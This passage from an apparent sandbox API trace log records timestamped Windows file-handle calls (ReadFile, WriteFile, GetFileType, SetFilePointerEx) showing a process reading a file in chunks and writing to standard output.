lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 
| out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.690] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.690] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.692] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 
[0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.693] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.693] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 
lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 
[0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, 
lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 
lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: 
lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, 
lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, 